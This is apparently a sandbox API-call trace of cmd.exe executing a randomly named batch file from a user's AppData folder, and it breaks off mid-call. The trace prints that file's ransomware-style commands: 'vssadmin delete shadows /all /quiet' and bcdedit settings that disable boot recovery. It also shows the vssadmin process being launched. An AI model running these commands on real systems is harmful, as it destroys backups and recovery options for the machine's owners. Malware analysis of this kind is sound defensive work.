[0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] GetFileType (hFile=0x7) returned 0x2 [0207.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.893] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480ff8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x480ff8*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0207.893] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] GetFileType (hFile=0x7) returned 0x2 [0207.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.893] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0207.894] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0207.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.894] GetFileType (hFile=0x7) returned 0x2 [0207.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.894] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0207.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.894] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0207.894] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0207.894] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0207.894] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0207.894] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0207.894] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0207.894] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0207.894] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0207.895] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0207.895] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0207.895] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0207.895] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.895] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0207.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.895] GetFileType (hFile=0x7) returned 0x2 [0207.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0207.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.895] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0207.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.895] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.896] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.896] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.896] SetConsoleInputExeNameW () returned 0x1 [0207.896] GetConsoleOutputCP () returned 0x1b5 [0207.896] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.896] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0207.896] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0207.896] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.896] SetFilePointer (in: hFile=0x54, lDistanceToMove=503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f7 [0207.897] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f7 [0207.897] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x45, lpOverlapped=0x0) returned 1 [0207.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x220 [0207.897] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=41, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="vssadmin.exe delete shadows /all /quiet\r\nll /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 41 [0207.897] _tell (_FileHandle=3) returned 544 [0207.897] _close (_FileHandle=3) returned 0 [0207.898] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0207.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.898] GetFileType (hFile=0x7) returned 0x2 [0207.898] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.898] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0207.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.898] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0207.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.898] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0207.898] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0207.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] GetFileType (hFile=0x7) returned 0x2 [0207.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] GetFileType (hFile=0x7) returned 0x2 [0207.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a0d90*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x4a0d90*, lpNumberOfCharsWritten=0x28f6f0*=0xc) returned 1 [0207.899] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" delete shadows /all /quiet ") returned 28 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] GetFileType (hFile=0x7) returned 0x2 [0207.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0207.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.900] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x1c) returned 1 [0207.900] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0207.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.900] GetFileType (hFile=0x7) returned 0x2 [0207.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0207.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.900] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0207.902] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.902] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.902] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.902] FindClose (in: hFindFile=0x491e00 | out: hFindFile=0x491e00) returned 1 [0207.902] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0207.902] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0207.902] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.902] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\vssadmin.exe")) returned 0xffffffff [0207.902] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0207.902] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0207.902] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0207.902] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0207.902] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0207.902] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0207.902] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0207.902] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0207.902] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0207.903] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0207.903] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0207.903] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0207.903] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0207.903] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0207.904] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0207.904] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0207.904] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0207.904] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0207.904] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0207.904] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0207.904] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0207.904] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0207.904] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0207.904] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0207.904] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0207.904] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0207.904] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0207.904] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0207.904] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0207.904] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0207.904] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0207.904] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0207.904] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0207.904] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0207.904] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.904] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.905] FindClose (in: hFindFile=0x492210 | out: hFindFile=0x492210) returned 1 [0207.905] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0207.905] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0207.905] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.905] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0207.905] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0207.905] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.905] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.905] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x28ef50*(hProcess=0x58, hThread=0x54, dwProcessId=0xf90, dwThreadId=0x9c4)) returned 1 [0207.906] CloseHandle (hObject=0x54) returned 1 [0207.906] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.906] GetEnvironmentStringsW () returned 0x4a0548* [0207.906] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0207.907] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0210.605] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x2) returned 1 [0210.605] CloseHandle (hObject=0x58) returned 1 [0210.605] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000002") returned 8 [0210.605] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0210.605] GetEnvironmentStringsW () returned 0x4a0548* [0210.605] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0210.605] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.605] GetEnvironmentStringsW () returned 0x4a0548* [0210.605] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0210.605] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0210.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.605] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.605] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.605] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.605] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.606] SetConsoleInputExeNameW () returned 0x1 [0210.606] GetConsoleOutputCP () returned 0x1b5 [0210.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.606] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.606] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0210.606] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0210.606] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.606] SetFilePointer (in: hFile=0x58, lDistanceToMove=544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x220 [0210.609] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.609] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x220 [0210.609] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x1c, lpOverlapped=0x0) returned 1 [0210.610] SetFilePointer (in: hFile=0x58, lDistanceToMove=570, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23a [0210.610] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\ns /all /quiet\r\nll /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 26 [0210.611] _tell (_FileHandle=3) returned 570 [0210.611] _close (_FileHandle=3) returned 0 [0210.611] _vsnwprintf (in: _Buffer=0x4a9f4640, 